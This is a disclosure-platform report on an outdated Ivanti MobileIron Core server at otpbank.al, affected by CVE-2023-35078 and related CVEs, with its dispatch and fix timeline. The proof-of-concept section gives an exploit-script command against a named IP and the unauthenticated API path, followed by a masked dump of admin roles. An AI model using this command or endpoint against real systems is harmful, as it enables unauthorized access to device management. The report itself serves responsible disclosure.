- Creation
- Validation
- Communication & fix
- Disclosure
otpbank.al / Ivanti MobileIron core is outdated
Chocapikk
reported 2023-08-05
The following Ivanti MobileIron instance is publicly accessible and looks out-dated :
It is critical to update to a safe version as soon as possible since it could lead to instance and devices takeover. Those vulnerabilities are currently used in ransomware campaign and could damage your network.
Reference:
Proof Of Concept:
$ python3.10 exploit.py --verbose -u https://80.78.65.45:443 9:14:39
Fetching data from: https://80.78.65.45:443/mifs/asfV3/api/v2/authorized/users?adminDeviceSpaceId=1
The response is not a valid JSON. The site is not vulnerable.
Fetching data from: https://80.78.65.45:443/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
https://80.78.65.45:443 may be vulnerable to CVE-2023-35078
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_USER_GOOGLE_DEVICE_ACCOUNT, ROLE_MPW_REG,
ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles:
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles:
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
--------------------------------------------------
Display Name: Name Masked
Last Login IP: IP Address Masked
Email Address: *****@*****.otpbank.al
Roles: ROLE_MPW_WIPE, ROLE_MPW_LOCATE, ROLE_MPW_RESET_PIN, ROLE_MPW_RESET_AC_PASSCODE, ROLE_MPW_LOCK,
ROLE_MPW_CHANGE_OWNERSHIP, ROLE_MPW_RETIRE, ROLE_MPW_REG, ROLE_MPW_UNLOCK, ROLE_USER_PORTAL_RW
IP:
80.78.65.45Port:
443Detected protocol:
httpsVulnerable URL:
https://80.78.65.45Found vulnerable Ivanti MobileIron Core instance:
Affected by CVE-2023-35082
Affected by CVE-2023-35078
Affected by CVE-2023-35081
WARNING: This event relies on the version reported by the software and might not account for manual patching of older versions. Please discard if manual RPM patch has been applied.
Found by MobileIronCorePlugin 2023-08-03
Report created by
Chocapikk
2023-08-05
Chocapikk
2023-08-05
Report approved by
BloodyShell
2023-08-05
BloodyShell
2023-08-05
New PDF report generated by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report dispatched to ...@... by system 2023-08-05
Report edited by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report marked as fixed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
Report closed by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report edited by
BloodyShell
2023-08-13
BloodyShell
2023-08-13
New PDF report generated by system 2023-08-13
Report edited by
Chocapikk
2023-08-13
Chocapikk
2023-08-13
New PDF report generated by system 2023-08-13
Report edited by
BloodyShell
2024-03-14
BloodyShell
2024-03-14
New PDF report generated by system 2024-03-14
Report edited by
BloodyShell
2024-03-14
BloodyShell
2024-03-14
New PDF report generated by system 2024-03-14
Information
Owner
otpbank.al
Created
2023-08-05 19:15
Updated
2024-03-14 10:00
Fixed
true
Contacts
A...@otpbank.al
i...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
A...@otpbank.al
Status
Status
closed
Hosting contacted
false
CERT contacted
false
Download report